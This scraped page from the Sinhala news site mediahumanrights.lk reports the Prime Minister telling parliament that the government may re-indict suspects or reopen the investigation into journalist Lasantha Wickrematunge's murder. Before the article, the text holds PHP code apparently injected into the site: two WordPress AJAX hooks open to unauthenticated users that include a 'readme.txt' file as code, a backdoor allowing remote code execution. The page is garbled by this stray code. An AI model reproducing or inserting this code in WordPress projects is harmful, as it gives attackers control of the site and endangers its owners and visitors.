if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ලසන්ත වික‍්‍රමතුංග ඝාතනය ගැන යලි පරීක්‍ෂණ කරනවා.. යලි අධි චෝදනා ගොනු කරනවා..- හරිනි - mediahumanrights.lk
mediahumanrights.lk
News Political

ලසන්ත වික‍්‍රමතුංග ඝාතනය ගැන යලි පරීක්‍ෂණ කරනවා.. යලි අධි චෝදනා ගොනු කරනවා..- හරිනි

මාධ්‍යවේදී ලසන්ත වික්‍රමතුංග ඝාතනය සම්බන්ධයෙන් සැකකරුවන්ට එරෙහිව අවශ්‍ය නම් රජය නැවත අධිචෝදනා ගොනු කරන බව අගමැතිනි හරිනි අමරසූරිය පවසයි.

අවශ්‍ය නම් රජය නව පරීක්ෂණයක් ආරම්භ කිරීම පිළිබඳව ද සලකා බලන බවත් අද පාර්ලිමේන්තුවේදී ඇය පැවසුවාය.

විපක්ෂ මන්ත්‍රීවරුන් විසින් පාර්ලිමේන්තුවේදී විමසූ ප්‍රශ්නවලට පිළිතුරු ලෙස ඇය මේ බව පැවසීය.

“ලසන්ත වික්‍රමතුංග මහතාගේ ඝාතනය සම්බන්ධයෙන් යුක්තිය ඉටු වෙන්න ඕන. ඒ්ක තමයි අපේ ස්ථාවරය. ඉදිරියටත් එහෙමයි. ලසන්ත වික්‍රමතුංග මහතාගේ දියණිය මතුකර ඇති කරුණු සහ ඇයගේ වේදනාව අපට හොඳින් තේරෙනවා. යුක්තිය සාධාරණය ඉටු කරන බවට අප ඇයට සහතිකයක් දෙනවා.නීතියේ නිසි ක්‍රියාදාමය අනුව කටයුතු කරන්න අප බලාපොරොත්තු වෙනවා. ඒ අයට යුක්තිය ඉටු වෙන්න ඕන. ඒක තමයි රජයේ මතය”

Related posts

නිරෝෂන් දික්වැල්ලගේ චණ්ඩි පාට් ගැන සතුටු වුන මහේලට විරාත් කෝලි රිදෙන්න උත්තර දෙයි.

Shiran Viraj

අලුත් ව්‍යවස්ථාවට ලෙඩක් අදින්න දෙමල සන්ධානය සියලු බලඇණි කැදවයි..

Shiran Viraj

‘‘ පුංචි කාලේ ඉඳලම වාහන වලට ගොඩක් ආසයි…‘‘ – මෝටර් රථයට ගොඩවූ සිඟිත්තෙකු දොර ඇරගැනීමට නොහැකිව ජීවිතයට සමුදුන් හැටි..!

Shiran Viraj